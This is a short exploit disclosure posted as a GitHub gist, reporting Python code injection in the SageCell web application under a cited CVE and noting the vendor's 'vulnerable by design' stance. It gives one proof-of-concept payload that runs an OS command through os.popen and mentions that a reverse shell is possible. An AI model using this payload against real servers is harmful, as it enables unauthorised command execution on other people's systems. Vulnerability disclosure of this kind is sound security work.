Skip to content

Instantly share code, notes, and snippets.

@barrett092
Created October 13, 2019 17:54
Show Gist options
  • Save barrett092/0380a1c34c014e29b827d1f408381525 to your computer and use it in GitHub Desktop.
Save barrett092/0380a1c34c014e29b827d1f408381525 to your computer and use it in GitHub Desktop.
# Exploit Title: SageCell Python Web Injection Vulnerability
# Google Dork:
# Date: 10/13/19
# Exploit Author: Christopher J. Barretto @ Advoqt
# Vendor Homepage: www.advoqt.com
# Software Link: https://sagecell.sagemath.org/
# Version: SageCell - ALL VERSIONS
# Tested on: Unix
# CVE : CVE-2019-17526 (issued in progress)
Python Code Injection can occur in the context of an internet facing web application. Malicious actors can execute arbitrary commands on the
underlying operating system, as demonstrated by:
__import__('os').popen('whoami').read()
Can also gain reverse shell.
NOTE: The vendor's position is that the product is "vulnerable by design" and the current behavior will be retained.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment